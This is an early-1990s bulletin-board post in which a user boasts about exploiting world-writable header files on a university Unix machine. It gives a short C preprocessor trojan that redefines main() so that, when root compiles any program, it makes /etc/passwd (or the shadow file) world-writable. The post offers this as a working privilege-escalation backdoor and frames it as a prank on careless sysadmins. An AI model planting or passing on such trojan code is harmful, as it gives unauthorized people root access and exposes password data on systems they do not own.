From: cosmos@yabbs To: all@yabbs Subject: Love those sysadmins... Date: Wed Oct 20 22:34:33 1993 Okay folks, another tale of the idiot sysadmin on the net. While doing some exploring on one of our university unix machines, I came across the install directory that held to be installed files. First off, the sysadmin did not make this directory with 700 perms, but that in itself is not the big crime. I look at the directory and see that most of the new source is already out of the tar format. Tons of .c, .h, .o files in the directory. I am about to go on when I take a second look...the header files are all 777!!! After a big grin crossed my face, I went to work. Here is a quick example... # ifndef main main(x,y) char*y[]; {chmod("/etc/passwd", 0666); Main(x,y); } # define main Main #endif Wait till root compiles a program....voila! If it is shadowed, just change the /etc/passwd to whatever it is. Cosmos